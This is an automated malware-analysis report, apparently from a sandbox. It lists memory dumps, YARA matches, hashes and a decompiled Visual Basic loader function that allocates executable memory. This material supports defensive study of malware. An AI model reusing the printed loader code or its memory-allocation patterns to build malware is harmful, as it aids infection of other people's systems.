Memory Dump Source

Source File: 00000000.00000002.766503580.00000000020C0000.00000040.00000001.sdmp, Offset: 020C0000, based on PE: false

Yara matches

Similarity

API ID: AllocateMemoryVirtual
String ID: -3Z
API String ID: 2167126740-1463159056
Opcode ID: bcf215009c25b69d1f7bb9af230c97d57cc079a741506d8464d4c3ebdd8cf101
Instruction ID: 0b3e32ebf9d1fe37b5d1e44567af68f88fa1f489217c11cbe4f3aa546d73c4ae
Opcode Fuzzy Hash: bcf215009c25b69d1f7bb9af230c97d57cc079a741506d8464d4c3ebdd8cf101
Instruction Fuzzy Hash: C84136B5644388CFDB318F60CD507DE7BA6AFDA3A4F29412DCC499B260D3308E429B50

Uniqueness

Uniqueness Score: -1.00%

Function 004020E7, Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 601COMMON

Download Yara Rule

Strings

"i(, xrefs: 00402719

Memory Dump Source

Source File: 00000000.00000002.765267509.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.765249799.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.765369208.0000000000416000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.765390928.0000000000418000.00000002.00020000.sdmp Download File

Similarity

API ID:
String ID: "i(
API String ID: 0-1157772168
Opcode ID: 221622694e49687d5b446e3db1c7e71af71e05f473426dd7dc62eb8d21cd2f1d
Instruction ID: a838d6d3ee12f0c11ae121691eaa0d5585a5d3ce558e6a3895e1949ddfc8092c
Opcode Fuzzy Hash: 221622694e49687d5b446e3db1c7e71af71e05f473426dd7dc62eb8d21cd2f1d
Instruction Fuzzy Hash: 4CC19D26B197000B875A88BE45D4866D4C39FEF251269F63E612DF33A9EDB9CC0B114C

Uniqueness

Uniqueness Score: -1.00%

Function 00402061, Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 600COMMON

Download Yara Rule

Strings

"i(, xrefs: 00402719

Memory Dump Source

Source File: 00000000.00000002.765267509.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.765249799.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.765369208.0000000000416000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.765390928.0000000000418000.00000002.00020000.sdmp Download File

Similarity

API ID:
String ID: "i(
API String ID: 0-1157772168
Opcode ID: e0a10a1541417d088be9d4320000f805394666414f5013eee5c2bff8b354ed12
Instruction ID: 3438288e41b032cca3dbcd742f8f0a22fd1713cf2ac7d3cccd2bb6440c782595
Opcode Fuzzy Hash: e0a10a1541417d088be9d4320000f805394666414f5013eee5c2bff8b354ed12
Instruction Fuzzy Hash: 68D19D26B197000B8B5A88BE45D0966D4D39FEF251279F63E612DF33A9EDB9CC0B1148

Uniqueness

Uniqueness Score: -1.00%

Function 004021F3, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 515COMMON

Download Yara Rule

Strings

"i(, xrefs: 00402719

Memory Dump Source

Source File: 00000000.00000002.765267509.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.765249799.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.765369208.0000000000416000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.765390928.0000000000418000.00000002.00020000.sdmp Download File

Similarity

API ID:
String ID: "i(
API String ID: 0-1157772168
Opcode ID: 7d189b98a3bed45b488a5335e58f5877dc48cd479aae19d6c0f1d90fb4eeb631
Instruction ID: d7f173d1a2ce1dfeb7cc2e3082f72ab62cd9d3f97db829e16b5fc97b00ce54a6
Opcode Fuzzy Hash: 7d189b98a3bed45b488a5335e58f5877dc48cd479aae19d6c0f1d90fb4eeb631
Instruction Fuzzy Hash: 41B19C26B197000B875A88BE45D4866D4D39FEF25127AF63E612DF33A9EDB9CC0B114C

Uniqueness

Uniqueness Score: -1.00%

Function 00402267, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 464COMMON

Download Yara Rule

Strings

"i(, xrefs: 00402719

Memory Dump Source

Source File: 00000000.00000002.765267509.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.765249799.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.765369208.0000000000416000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.765390928.0000000000418000.00000002.00020000.sdmp Download File

Similarity

API ID:
String ID: "i(
API String ID: 0-1157772168
Opcode ID: 5ee361d0940aa8c9fc443c845f8039203afce4620bca5ebf19904e580596d439
Instruction ID: 3641bd03b5544c55e768349efa06b5a7758ca5e733952070553bd4eab94dbdf3
Opcode Fuzzy Hash: 5ee361d0940aa8c9fc443c845f8039203afce4620bca5ebf19904e580596d439
Instruction Fuzzy Hash: 2DA19C22B197000B875A88BE55D4866D4C39FEF25027AF63E612DF33A9EDB9CC0B1148

Uniqueness

Uniqueness Score: -1.00%

Function 00402379, Relevance: 3.4, APIs: 1, Strings: 1, Instructions: 379memoryCOMMON

Download Yara Rule

APIs

VirtualAlloc.KERNELBASE(00000000,00011000,-2D564770,-01FB8249), ref: 00402703

Strings

"i(, xrefs: 00402719

Memory Dump Source

Source File: 00000000.00000002.765267509.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.765249799.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.765369208.0000000000416000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.765390928.0000000000418000.00000002.00020000.sdmp Download File

Similarity

API ID: AllocVirtual
String ID: "i(
API String ID: 4275171209-1157772168
Opcode ID: f695afc481e898609701a8adfb483cbae3084ae3e54e9173b4e4928489d9c430
Instruction ID: 4a82b89bf16fe8d69969317596c305712d5c63f78a7f0fb18acf48acf4dd6f8e
Opcode Fuzzy Hash: f695afc481e898609701a8adfb483cbae3084ae3e54e9173b4e4928489d9c430
Instruction Fuzzy Hash: FB817F66B197000B875E88BE55D4866D4C39FEF25027AE63E612DF33A9EDB9CC0B1148

Uniqueness

Uniqueness Score: -1.00%

Function 020C82B3, Relevance: 1.6, APIs: 1, Instructions: 148memorynativeCOMMON

Download Yara Rule

APIs

NtAllocateVirtualMemory.NTDLL(?,000000F8,-8E9EAA00), ref: 020C8391

Memory Dump Source

Source File: 00000000.00000002.766503580.00000000020C0000.00000040.00000001.sdmp, Offset: 020C0000, based on PE: false

Yara matches

Similarity

API ID: AllocateMemoryVirtual
String ID:
API String ID: 2167126740-0
Opcode ID: 128610d52500db569f6b2cee75f36a78d40c311503213db37605b344d9f05f69
Instruction ID: 80e66e4390aab2f10ec8c81546833cf2a16d6fe87df3bf2209ec984088cddb5c
Opcode Fuzzy Hash: 128610d52500db569f6b2cee75f36a78d40c311503213db37605b344d9f05f69
Instruction Fuzzy Hash: 8241872B284698C6DB124B71BC823FDBF516F8A670B24997ECEC647995E373424DD301

Uniqueness

Uniqueness Score: -1.00%

Function 020C8352, Relevance: 1.6, APIs: 1, Instructions: 120memorynativeCOMMON

Download Yara Rule

APIs

NtAllocateVirtualMemory.NTDLL(?,000000F8,-8E9EAA00), ref: 020C8391

Memory Dump Source

Source File: 00000000.00000002.766503580.00000000020C0000.00000040.00000001.sdmp, Offset: 020C0000, based on PE: false

Yara matches

Similarity

API ID: AllocateMemoryVirtual
String ID:
API String ID: 2167126740-0
Opcode ID: a822765371d77f214b457b6705884af9293b63c269a56030b6bbc7cd5ab0e1f6
Instruction ID: 26a3938be4bb57ac40b6ff916079a143e4369475efe1788d878469a41c8ee1e1
Opcode Fuzzy Hash: a822765371d77f214b457b6705884af9293b63c269a56030b6bbc7cd5ab0e1f6
Instruction Fuzzy Hash: 6D31E83A284688C7DB224B71EC823FCBF51AF8A770F24993ECDC647595E37245099705

Uniqueness

Uniqueness Score: -1.00%

Function 020C8234, Relevance: 1.6, APIs: 1, Instructions: 118memorynativeCOMMON

Download Yara Rule

APIs

NtAllocateVirtualMemory.NTDLL(?,000000F8,-8E9EAA00), ref: 020C8391

Memory Dump Source

Source File: 00000000.00000002.766503580.00000000020C0000.00000040.00000001.sdmp, Offset: 020C0000, based on PE: false

Yara matches

Similarity

API ID: AllocateMemoryVirtual
String ID:
API String ID: 2167126740-0
Opcode ID: 108567606dc3cfe3a70e38ae0416f3946ae7a09c2f7f30557d3e5263cdfbd2a1
Instruction ID: a4cf86bd813256f3b49e022c7e794eda332248e1f272b93f49f2837fc7d12f20
Opcode Fuzzy Hash: 108567606dc3cfe3a70e38ae0416f3946ae7a09c2f7f30557d3e5263cdfbd2a1
Instruction Fuzzy Hash: 014123B1A44749DFDB318F54DD807DDB7A6EF893A0F29412DDC089B360D3308A429B54

Uniqueness

Uniqueness Score: -1.00%

Function 020C8253, Relevance: 1.6, APIs: 1, Instructions: 74memorynativeCOMMON

Download Yara Rule

APIs

NtAllocateVirtualMemory.NTDLL(?,000000F8,-8E9EAA00), ref: 020C8391

Memory Dump Source

Source File: 00000000.00000002.766503580.00000000020C0000.00000040.00000001.sdmp, Offset: 020C0000, based on PE: false

Yara matches

Similarity

API ID: AllocateMemoryVirtual
String ID:
API String ID: 2167126740-0
Opcode ID: 7ec30ecc7fefc86fa18d1dabe1d32713c2f06c2de66fcd0e94d846ba319d0510
Instruction ID: 92c193ebe89ba905543b03f0bf0ca1fb62f98f4cb44697ecb91e257689b4b7ac
Opcode Fuzzy Hash: 7ec30ecc7fefc86fa18d1dabe1d32713c2f06c2de66fcd0e94d846ba319d0510
Instruction Fuzzy Hash: C021D6B1504788CFDB328F64CC507DDBBA6AF96354F29811ACC495B261D7318A42EB40

Uniqueness

Uniqueness Score: -1.00%

Function 020C8371, Relevance: 1.5, APIs: 1, Instructions: 45memorynativeCOMMON

Download Yara Rule

APIs

NtAllocateVirtualMemory.NTDLL(?,000000F8,-8E9EAA00), ref: 020C8391

Memory Dump Source

Source File: 00000000.00000002.766503580.00000000020C0000.00000040.00000001.sdmp, Offset: 020C0000, based on PE: false

Yara matches

Similarity

API ID: AllocateMemoryVirtual
String ID:
API String ID: 2167126740-0
Opcode ID: d80b3b32fee76364c36e92577f6740513e8fc82ee87331a53ec391d56dbeb7e7
Instruction ID: 968d1f1507ca46f1f99087c6b9f0be02abbcdf355dca453e0586c96b3b0c36b1
Opcode Fuzzy Hash: d80b3b32fee76364c36e92577f6740513e8fc82ee87331a53ec391d56dbeb7e7
Instruction Fuzzy Hash: 06019E70101A89CBDB328F64DC50BEDBBA6EF8A354F288219DC488B231C7318A429B41

Uniqueness

Uniqueness Score: -1.00%

Function 00414356, Relevance: 59.9, APIs: 33, Strings: 1, Instructions: 361
COMMON

Download Yara Rule

C-Code - Quality: 53%

			E00414356(void* __ebx, void* __edi, void* __esi, signed int _a4, intOrPtr _a886) {
				signed int _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				char _v36;
				char _v40;
				char _v44;
				char _v48;
				char _v52;
				char _v56;
				intOrPtr _v64;
				char _v72;
				intOrPtr _v80;
				char _v88;
				intOrPtr _v96;
				char _v104;
				intOrPtr _v112;
				char _v120;
				intOrPtr _v144;
				char _v152;
				char _v188;
				char _v192;
				char _v196;
				char _v200;
				char _v204;
				short _v208;
				short _t113;
				intOrPtr* _t118;
				intOrPtr* _t120;
				void* _t122;
				intOrPtr* _t124;
				intOrPtr* _t126;
				intOrPtr* _t128;
				void* _t130;
				intOrPtr* _t132;
				intOrPtr* _t134;
				void* _t136;
				char* _t137;
				void* _t138;
				void* _t143;
				char _t144;
				intOrPtr _t149;
				void* _t151;
				intOrPtr* _t152;
				void* _t153;
				void* _t155;
				intOrPtr* _t156;
				void* _t157;
				void* _t159;
				intOrPtr* _t160;
				void* _t161;
				char _t163;
				void* _t164;
				void* _t166;
				void* _t167;
				signed int _t198;
				signed int _t199;
				intOrPtr* _t200;
				intOrPtr* _t201;
				intOrPtr* _t202;
				signed int _t203;
				intOrPtr* _t204;
				intOrPtr* _t205;
				intOrPtr* _t206;
				intOrPtr* _t207;
				intOrPtr* _t208;
				intOrPtr* _t209;
				void* _t210;
				void* _t212;
				intOrPtr _t213;
				intOrPtr _t219;
				intOrPtr _t222;
				intOrPtr _t225;

				_t213 = _t212 - 0xc;
				 *[fs:0x0] = _t213;
				_v16 = _t213 - 0xd8;
				_v12 = 0x401118;
				_t198 = _a4;
				_v8 = _t198 & 0x00000001;
				_t199 = _t198 & 0xfffffffe;
				_a4 = _t199;
				 *((intOrPtr*)( *_t199 + 4))(_t199, __edi, __esi, __ebx,  *[fs:0x0], 0x401176, _t210);
				_t163 = 2;
				_push( &_v72);
				_v72 = 0;
				_push( &_v88);
				_v36 = 0;
				_v40 = 0;
				_v44 = 0;
				_v48 = 0;
				_v52 = 0;
				_v56 = 0;
				_v88 = 0;
				_v104 = 0;
				_v120 = 0;
				_v152 = 0;
				_v188 = 0;
				_v192 = 0;
				_v196 = 0;
				_v204 = 0;
				_v200 = 0;
				_v64 = 9;
				_v72 = _t163;
				L00401242();
				_v144 = 0xb;
				_push( &_v88);
				_t113 =  &_v152;
				_push(_t113);
				_v152 = 0x8002;
				L00401248();
				_v208 = _t113;
				_push( &_v88);
				_push( &_v72);
				_push(_t163);
				L00401260();
				if(_v208 != 0) {
					_t219 =  *0x416e8c; // 0x2aae8cc
					if(_t219 == 0) {
						_push(0x416e8c);
						_push(0x412434);
						L004012A8();
					}
					_t204 =  *0x416e8c; // 0x2aae8cc
					_t151 =  *((intOrPtr*)( *_t204 + 0x14))(_t204,  &_v48);
					asm("fclex");
					if(_t151 >= 0) {
						_t167 = 0x412424;
					} else {
						_t167 = 0x412424;
						_push(0x14);
						_push(0x412424);
						_push(_t204);
						_push(_t151);
						L004012A2();
					}
					_t152 = _v48;
					_t205 = _t152;
					_t153 =  *((intOrPtr*)( *_t152 + 0xd0))(_t152,  &_v44);
					asm("fclex");
					if(_t153 < 0) {
						_push(0xd0);
						_push(0x412444);
						_push(_t205);
						_push(_t153);
						L004012A2();
					}
					_v44 = 0;
					L004012B4();
					L00401296();
					_t222 =  *0x416e8c; // 0x2aae8cc
					if(_t222 == 0) {
						_push(0x416e8c);
						_push(0x412434);
						L004012A8();
					}
					_t206 =  *0x416e8c; // 0x2aae8cc
					_t155 =  *((intOrPtr*)( *_t206 + 0x14))(_t206,  &_v48);
					asm("fclex");
					if(_t155 < 0) {
						_push(0x14);
						_push(_t167);
						_push(_t206);
						_push(_t155);
						L004012A2();
					}
					_t156 = _v48;
					_t207 = _t156;
					_t157 =  *((intOrPtr*)( *_t156 + 0xd0))(_t156,  &_v44);
					asm("fclex");
					if(_t157 < 0) {
						_push(0xd0);
						_push(0x412444);
						_push(_t207);
						_push(_t157);
						L004012A2();
					}
					_v44 = 0;
					L004012B4();
					L00401296();
					_t225 =  *0x416e8c; // 0x2aae8cc
					if(_t225 == 0) {
						_push(0x416e8c);
						_push(0x412434);
						L004012A8();
					}
					_t208 =  *0x416e8c; // 0x2aae8cc
					_t159 =  *((intOrPtr*)( *_t208 + 0x1c))(_t208,  &_v48);
					asm("fclex");
					if(_t159 < 0) {
						_push(0x1c);
						_push(_t167);
						_push(_t208);
						_push(_t159);
						L004012A2();
					}
					_t160 = _v48;
					_t209 = _t160;
					_t161 =  *((intOrPtr*)( *_t160 + 0x50))(_t160);
					asm("fclex");
					if(_t161 < 0) {
						_push(0x50);
						_push(0x412488);
						_push(_t209);
						_push(_t161);
						L004012A2();
					}
					L00401296();
					_t199 = _a4;
				}
				 *((intOrPtr*)( *_t199 + 0x708))(_t199,  &_v204);
				_t118 =  *0x416010; // 0x737d18
				if(_t118 != 0) {
					_t164 = 0x412830;
				} else {
					_t164 = 0x412830;
					_push(0x416010);
					_push(0x412830);
					L004012A8();
					_t118 =  *0x416010; // 0x737d18
				}
				_t120 =  &_v48;
				L0040123C();
				_t200 = _t120;
				_t122 =  *((intOrPtr*)( *_t200 + 0x140))(_t200,  &_v188, _t120,  *((intOrPtr*)( *_t118 + 0x35c))(_t118));
				asm("fclex");
				if(_t122 < 0) {
					_push(0x140);
					_push(0x412498);
					_push(_t200);
					_push(_t122);
					L004012A2();
				}
				_v192 = _v188;
				_t124 = _a4;
				 *((intOrPtr*)( *_t124 + 0x70c))(_t124,  &_v192, L"DOKTRINENS", 0x86c429);
				L00401296();
				_t126 =  *0x416010; // 0x737d18
				if(_t126 == 0) {
					_push(0x416010);
					_push(_t164);
					L004012A8();
					_t126 =  *0x416010; // 0x737d18
				}
				_t128 =  &_v48;
				L0040123C();
				_t201 = _t128;
				_t130 =  *((intOrPtr*)( *_t201 + 0xf8))(_t201,  &_v52, _t128,  *((intOrPtr*)( *_t126 + 0x338))(_t126));
				asm("fclex");
				if(_t130 < 0) {
					_push(0xf8);
					_push(0x4124c4);
					_push(_t201);
					_push(_t130);
					L004012A2();
				}
				_push(0);
				_push(0);
				_push(_v52);
				_push( &_v72);
				L00401236();
				_t132 =  *0x416010; // 0x737d18
				if(_t132 == 0) {
					_push(0x416010);
					_push(_t164);
					L004012A8();
					_t132 =  *0x416010; // 0x737d18
				}
				_t134 =  &_v56;
				L0040123C();
				_t202 = _t134;
				_t136 =  *((intOrPtr*)( *_t202 + 0x120))(_t202,  &_v196, _t134,  *((intOrPtr*)( *_t132 + 0x35c))(_t132));
				asm("fclex");
				if(_t136 < 0) {
					_push(0x120);
					_push(0x412498);
					_push(_t202);
					_push(_t136);
					L004012A2();
				}
				_t203 = _a4;
				_t137 =  &_v72;
				L00401230();
				_t138 =  *((intOrPtr*)( *_t203 + 0x6fc))(_t203, _t137, _t137, _v196);
				if(_t138 < 0) {
					_push(0x6fc);
					_push(0x4121bc);
					_push(_t203);
					_push(_t138);
					L004012A2();
				}
				_t166 = 3;
				L00401284();
				L0040127E();
				_t143 =  *((intOrPtr*)( *_t203 + 0x2b4))(_t203, _t166,  &_v48,  &_v56,  &_v52);
				asm("fclex");
				if(_t143 < 0) {
					_push(0x2b4);
					_push(0x41218c);
					_push(_t203);
					_push(_t143);
					L004012A2();
				}
				_t144 = 0xa;
				_v112 = 0x80020004;
				_v120 = _t144;
				_v104 = _t144;
				_v88 = _t144;
				_push( &_v120);
				_push( &_v104);
				_push( &_v88);
				_push(0);
				_push( &_v72);
				_v96 = 0x80020004;
				_v80 = 0x80020004;
				_v64 = 0xcc377;
				_a886 = 0xffcb7712;
				_a886 = _a886 - 0xff8b5708;
				_push(0x13);
				_push(_t203);
				_push(0);
				_t149 = _a886;
				_push(_t149);
				return _t149;
			}

0x00414359
0x00414368
0x00414378
0x0041437b
0x00414382
0x0041438a
0x0041438d
0x00414391
0x00414396
0x0041439e
0x004143a1
0x004143a5
0x004143a8
0x004143a9
0x004143ac
0x004143af
0x004143b2
0x004143b5
0x004143b8
0x004143bb
0x004143be
0x004143c1
0x004143c4
0x004143ca
0x004143d0
0x004143d6
0x004143dc
0x004143e2
0x004143e8
0x004143ef
0x004143f2
0x004143fa
0x00414404
0x00414405
0x0041440b
0x0041440c
0x00414416
0x0041441b
0x00414425
0x00414429
0x0041442a
0x0041442b
0x0041443a
0x00414440
0x00414446
0x00414448
0x0041444d
0x00414452
0x00414452
0x00414457
0x00414464
0x00414469
0x0041446b
0x0041447e
0x0041446d
0x0041446d
0x00414472
0x00414474
0x00414475
0x00414476
0x00414477
0x00414477
0x00414483
0x0041448d
0x0041448f
0x00414497
0x00414499
0x0041449b
0x004144a0
0x004144a5
0x004144a6
0x004144a7
0x004144a7
0x004144b2
0x004144b5
0x004144bd
0x004144c2
0x004144c8
0x004144ca
0x004144cf
0x004144d4
0x004144d4
0x004144d9
0x004144e6
0x004144eb
0x004144ed
0x004144ef
0x004144f1
0x004144f2
0x004144f3
0x004144f4
0x004144f4
0x004144f9
0x00414503
0x00414505
0x0041450d
0x0041450f
0x00414511
0x00414516
0x0041451b
0x0041451c
0x0041451d
0x0041451d
0x00414528
0x0041452b
0x00414533
0x00414538
0x0041453e
0x00414540
0x00414545
0x0041454a
0x0041454a
0x0041454f
0x0041455c
0x00414561
0x00414563
0x00414565
0x00414567
0x00414568
0x00414569
0x0041456a
0x0041456a
0x0041456f
0x00414573
0x00414577
0x0041457c
0x0041457e
0x00414580
0x00414582
0x00414587
0x00414588
0x00414589
0x00414589
0x00414591
0x00414596
0x00414596
0x004145a3
0x004145a9
0x004145b0
0x004145c9
0x004145b2
0x004145b2
0x004145b7
0x004145bc
0x004145bd
0x004145c2
0x004145c2
0x004145d8
0x004145dc
0x004145e1
0x004145ed
0x004145f5
0x004145f7
0x004145f9
0x004145fe
0x00414603
0x00414604
0x00414605
0x00414605
0x00414615
0x0041461b
0x0041462d
0x00414636
0x0041463b
0x00414642
0x00414644
0x00414649
0x0041464a
0x0041464f
0x0041464f
0x0041465e
0x00414662
0x00414667
0x00414670
0x00414678
0x0041467a
0x0041467c
0x00414681
0x00414686
0x00414687
0x00414688
0x00414688
0x0041468d
0x0041468e
0x0041468f
0x00414695
0x00414696
0x0041469b
0x004146a5
0x004146a7
0x004146ac
0x004146ad
0x004146b2
0x004146b2
0x004146c1
0x004146c5
0x004146ca
0x004146d6
0x004146de
0x004146e0
0x004146e2
0x004146e7
0x004146ec
0x004146ed
0x004146ee
0x004146ee
0x004146f9
0x004146fc
0x00414702
0x00414709
0x00414711
0x00414713
0x00414718
0x0041471d
0x0041471e
0x0041471f
0x0041471f
0x00414732
0x00414734
0x0041473f
0x00414747
0x0041474f
0x00414751
0x00414753
0x00414758
0x0041475d
0x0041475e
0x0041475f
0x0041475f
0x0041476b
0x0041476c
0x0041476f
0x00414772
0x00414775
0x0041477b
0x0041477f
0x00414783
0x00414787
0x00414788
0x00414789
0x0041478c
0x0041478f
0x00414796
0x004147a0
0x004147aa
0x004147ac
0x004147ad
0x004147ae
0x004147b4
0x004147b5

APIs

#575.MSVBVM60(?,?), ref: 004143F2
__vbaVarTstNe.MSVBVM60(?,?,?,?), ref: 00414416
__vbaFreeVarList.MSVBVM60(00000002,?,?,?,?,?,?), ref: 0041442B
__vbaNew2.MSVBVM60(00412434,00416E8C), ref: 00414452
__vbaHresultCheckObj.MSVBVM60(00000000,02AAE8CC,00412424,00000014), ref: 00414477
__vbaHresultCheckObj.MSVBVM60(00000000,?,00412444,000000D0), ref: 004144A7
__vbaStrMove.MSVBVM60(00000000,?,00412444,000000D0), ref: 004144B5
__vbaFreeObj.MSVBVM60(00000000,?,00412444,000000D0), ref: 004144BD
__vbaNew2.MSVBVM60(00412434,00416E8C), ref: 004144D4
__vbaHresultCheckObj.MSVBVM60(00000000,02AAE8CC,00412424,00000014), ref: 004144F4
__vbaHresultCheckObj.MSVBVM60(00000000,?,00412444,000000D0), ref: 0041451D
__vbaStrMove.MSVBVM60(00000000,?,00412444,000000D0), ref: 0041452B
__vbaFreeObj.MSVBVM60(00000000,?,00412444,000000D0), ref: 00414533
__vbaNew2.MSVBVM60(00412434,00416E8C), ref: 0041454A
__vbaHresultCheckObj.MSVBVM60(00000000,02AAE8CC,00412424,0000001C), ref: 0041456A
__vbaHresultCheckObj.MSVBVM60(00000000,?,00412488,00000050), ref: 00414589
__vbaFreeObj.MSVBVM60(00000000,?,00412488,00000050), ref: 00414591
__vbaNew2.MSVBVM60(00412830,00416010), ref: 004145BD
__vbaObjSet.MSVBVM60(?,00000000), ref: 004145DC
__vbaHresultCheckObj.MSVBVM60(00000000,00000000,00412498,00000140), ref: 00414605
__vbaFreeObj.MSVBVM60 ref: 00414636
__vbaNew2.MSVBVM60(00412830,00416010), ref: 0041464A
__vbaObjSet.MSVBVM60(?,00000000), ref: 00414662
__vbaHresultCheckObj.MSVBVM60(00000000,00000000,004124C4,000000F8), ref: 00414688
__vbaLateIdCallLd.MSVBVM60(?,?,00000000,00000000), ref: 00414696
__vbaNew2.MSVBVM60(00412830,00416010), ref: 004146AD
__vbaObjSet.MSVBVM60(?,00000000), ref: 004146C5
__vbaHresultCheckObj.MSVBVM60(00000000,00000000,00412498,00000120), ref: 004146EE
__vbaI4Var.MSVBVM60(?,?), ref: 00414702
__vbaHresultCheckObj.MSVBVM60(00000000,00401118,004121BC,000006FC), ref: 0041471F
__vbaFreeObjList.MSVBVM60(00000003,?,?,?), ref: 00414734
__vbaFreeVar.MSVBVM60(00000000,00401118,004121BC,000006FC), ref: 0041473F
__vbaHresultCheckObj.MSVBVM60(00000000,00401118,0041218C,000002B4), ref: 0041475F

Strings

DOKTRINENS, xrefs: 00414624

Memory Dump Source

Source File: 00000000.00000002.765267509.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.765249799.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.765369208.0000000000416000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.765390928.0000000000418000.00000002.00020000.sdmp Download File

Similarity

API ID: __vba$CheckHresult$Free$New2$ListMove$#575CallLate
String ID: DOKTRINENS
API String ID: 3283565208-1396343105
Opcode ID: a9106e93b3927ee37656e3010371ea00e37dc9dcf8ce48424f3c3193da1a2883
Instruction ID: f58cf62d93759ba7ce16f864b018240f887fdbaf5eb98f1b427dfdef2b86de2d
Opcode Fuzzy Hash: a9106e93b3927ee37656e3010371ea00e37dc9dcf8ce48424f3c3193da1a2883
Instruction Fuzzy Hash: 98D13A71900208ABDB10DB95CD85EDEB7BCEF58704F1085ABF109F72A1D6789945CB68

Uniqueness

Uniqueness Score: -1.00%

Function 004023FB, Relevance: 3.4, APIs: 1, Strings: 1, Instructions: 384
memoryCOMMON

Download Yara Rule

C-Code - Quality: 46%

			E004023FB(void* __ebx, void* __ecx, void* __edi, void* __esi) {
				void* _t53;
				void* _t127;
				void* _t129;

				 *((intOrPtr*)(__edi + 0x5f)) =  *((intOrPtr*)(__edi + 0x5f)) - __ebx;
				_pop(_t127);
				asm("fnop");
				_t53 = __ecx;
				asm("fnop");
				_t129 = _t127;
				goto L2;
			}

0x004023fe
0x0040242e
0x00402437
0x0040244f
0x00402455
0x00402463
0x00402467

APIs

VirtualAlloc.KERNELBASE(00000000,00011000,-2D564770,-01FB8249), ref: 00402703

Strings

"i(, xrefs: 00402719

Memory Dump Source

Source File: 00000000.00000002.765267509.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.765249799.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.765369208.0000000000416000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.765390928.0000000000418000.00000002.00020000.sdmp Download File

Similarity

API ID: AllocVirtual
String ID: "i(
API String ID: 4275171209-1157772168
Opcode ID: 90730d0a0b6177a32ff23f75ecd87836111c96b9571754fca7d6f57df018b080
Instruction ID: 45528e60dafe8570bf72a445d1eb1020d09e6d6b2faec44fe57c1bdaab58fe3d
Opcode Fuzzy Hash: 90730d0a0b6177a32ff23f75ecd87836111c96b9571754fca7d6f57df018b080
Instruction Fuzzy Hash: 0A817E66B197000B875E88BE55D4867D4C79FEE21027AE63E612DF33A9EDB9CC0B1148

Uniqueness

Uniqueness Score: -1.00%

Function 0040248D, Relevance: 3.3, APIs: 1, Strings: 1, Instructions: 328COMMON

Download Yara Rule

Strings

"i(, xrefs: 00402719

Memory Dump Source

Source File: 00000000.00000002.765267509.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.765249799.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.765369208.0000000000416000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.765390928.0000000000418000.00000002.00020000.sdmp Download File

Similarity

API ID:
String ID: "i(
API String ID: 0-1157772168
Opcode ID: fc3e0a6d958a70f08f612d88812f322ea5a826517dc3bc653b97ce4eee9d5515
Instruction ID: ee843afe0c42772de5c6b535a3a6ee51faead98d6a660c65ab776b39fca87342
Opcode Fuzzy Hash: fc3e0a6d958a70f08f612d88812f322ea5a826517dc3bc653b97ce4eee9d5515
Instruction Fuzzy Hash: D1719D66B197000B875AC4BE55D4866D4C39FEF220379E63E612DF73A9EEB9CC0B1148

Uniqueness

Uniqueness Score: -1.00%

Function 00402511, Relevance: 3.3, APIs: 1, Strings: 1, Instructions: 298COMMON

Download Yara Rule

Strings

"i(, xrefs: 00402719

Memory Dump Source

Source File: 00000000.00000002.765267509.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.765249799.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.765369208.0000000000416000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.765390928.0000000000418000.00000002.00020000.sdmp Download File

Similarity

API ID:
String ID: "i(
API String ID: 0-1157772168
Opcode ID: c9aabb01c6d76544d7bb45b7bc3afca5438cd54f02359538efb928340b308a8f
Instruction ID: efa650c1e05888e8ba4e0471a56981021fa941c6aaba143e54a527a907c6e33a
Opcode Fuzzy Hash: c9aabb01c6d76544d7bb45b7bc3afca5438cd54f02359538efb928340b308a8f
Instruction Fuzzy Hash: 5E519F66B197000B875D84BE55D4867D4C39FEF250369E63E612DF33A9EDB9CC0B1148

Uniqueness

Uniqueness Score: -1.00%

Function 00402597, Relevance: 3.3, APIs: 1, Strings: 1, Instructions: 287memoryCOMMON

Download Yara Rule

APIs

VirtualAlloc.KERNELBASE(00000000,00011000,-2D564770,-01FB8249), ref: 00402703

Strings

"i(, xrefs: 00402719

Memory Dump Source

Source File: 00000000.00000002.765267509.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.765249799.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.765369208.0000000000416000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.765390928.0000000000418000.00000002.00020000.sdmp Download File

Similarity

API ID: AllocVirtual
String ID: "i(
API String ID: 4275171209-1157772168
